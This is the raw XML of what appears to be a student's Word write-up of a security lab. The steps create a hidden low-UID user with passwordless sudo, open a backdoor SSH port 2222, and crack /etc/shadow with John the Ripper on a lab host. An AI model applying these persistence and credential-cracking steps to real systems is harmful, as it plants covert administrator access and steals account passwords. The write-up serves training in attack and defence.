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4EE1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1: Shadow People</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8CF7EA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 xml:space="preserve">Create a secret user named </w:t>
      </w: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sysd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>. Make sure this user doesn't have a home folder created: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sudo useradd --no-create-home sysd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F8E3F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Give your secret user a password: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sudo passwd sysd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D0D03E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Give your secret user a system UID &lt; 1000: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sudo usermod -u 902 sysd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD1ADB2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aGive your secret user the same GID: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sudo groupmod -g 902 sysd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330150F8" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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sGive your secret user full sudo access without the need for a password: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548C02A0" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35">
      <w:pPr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1st add the user to the sudo’s group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D875F" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35">
      <w:pPr>
        <w:spacing w:after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sudo usermod -a -G sudo sysd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F19C9" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="0078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CF86F" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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ab/>
      </w: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2nd modify the sudoers file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F36794" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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  <w:t xml:space="preserve">Run </w:t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sudo visudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D98DE0" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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  <w:t>Add NOPASSWD to this existing line in the sudoers file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24C6E7" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35">
      <w:pPr>
        <w:spacing w:after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# Allow members of group sudo to execute any command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EF87C7" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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ab/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ab/>
        <w:t>%sudo ALL=(ALL:ALL) NOPASSWD:ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E389A83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Test that sudo access works without your password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C566D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From sysadmin account I changed to sysd account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC6E56" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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I ran:</w:t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ab/>
        <w:t>su sysd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 xml:space="preserve"> so I could test from the newly created account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981B1CF" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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 xml:space="preserve">I ran </w:t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 xml:space="preserve">sudo adduser tempuser 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 xml:space="preserve">and the user was created and I was </w:t>
      </w:r>
      <w:r w:rsidRPr="00784D35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not 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>prompted to put in the sudo password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F207F" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00784D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DEA138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2: Smooth Sailing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DBCF90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Edit the sshd_config file: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6B6A892" w14:textId="4815DCB5" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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View what ports are currently listening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ss  -tlnp | grep -E “22 | 2222”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12EFB97" wp14:editId="265C903B">
            <wp:extent cx="4572000" cy="88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BA09" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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Run this command to open the file for editing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3486D2AC" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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sudo nano /etc/ssh/sshd_config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334CDD70" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="0078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7DA12" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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Uncomment port 22 and add a line for port 2222.  CTRL X / Y to save and exit editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D5A9D9" w14:textId="24CF1C7C" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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276B335" wp14:editId="728649EE">
            <wp:extent cx="2216785" cy="111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C459" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="0078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64DFE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3: Testing Your Configuration Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5AE3F1" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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Restart the ssh service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE73FC8" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35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sudo systemctl restart sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186D471" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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Rerun command to view what ports are currently listening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ss  -tlnp | grep -E “22”2222”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C90C566" w14:textId="09BB8F44" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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00"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC5F2E8" wp14:editId="2F0FBC67">
            <wp:extent cx="4045585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A56F" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="0078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Exit the root account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096462D4" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D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logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3007C6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SSH to the target machine using your sysd account and port 2222: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ab/>
        <w:t>ssh sysd@192.168.6.105 -p 2222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CA72FF1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Use sudo to switch to the root user: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sudo su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6F184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4: Crack All the Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACC1AF0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t>SSH back to the system using your sysd account and port 2222:</w:t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84D3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ssh sysd@192.168.6.105 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133235B1" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08428C3D" w14:textId="1D67219B" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D3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B04BBC0" wp14:editId="14C67AF1">
            <wp:extent cx="4498975" cy="1294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B7D4" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="0078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ab/>
        <w:t>john /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B3EA5" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784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F18E1" w14:textId="439330B0" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D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D3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FA365D4" wp14:editId="08DA8E56">
            <wp:extent cx="4900930" cy="115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6298" w14:textId="77777777" w:rsidR="00784D35" w:rsidRPr="00784D35" w:rsidRDefault="00784D35" w:rsidP="00784D35"/>
    <w:sectPr w:rsidR="00784D35" w:rsidRPr="0078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35"/>
    <w:rsid w:val="0078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B3E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5DE1A3B2-A11E-4D7F-9ADE-B3A435DE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4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Massicott</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Steve Massicott</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-19T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-19T03:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>